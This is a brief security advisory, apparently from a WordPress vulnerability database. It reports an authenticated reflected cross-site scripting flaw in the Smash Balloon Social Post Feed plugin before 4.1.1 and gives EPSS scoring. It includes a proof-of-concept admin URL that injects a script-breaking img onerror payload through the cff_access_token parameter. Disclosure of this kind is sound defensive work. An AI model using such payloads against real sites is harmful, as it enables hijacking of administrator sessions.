Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting (XSS)

2021-12-1600:00:00

Krzysztof Zając

254

smash balloon social

authenticated

reflected cross-site scripting

xss

security exploit

EPSS

0.001

Percentile

30.1%

The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.

http://127.0.0.1:8001/wp-admin/admin.php?page=cff-top&cff_access_token=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3E&cff_final_response=true

EPSS

0.001

Percentile

30.1%

Related for WPEX-ID:AE1AAB4E-B00A-458B-A176-85761655BDCC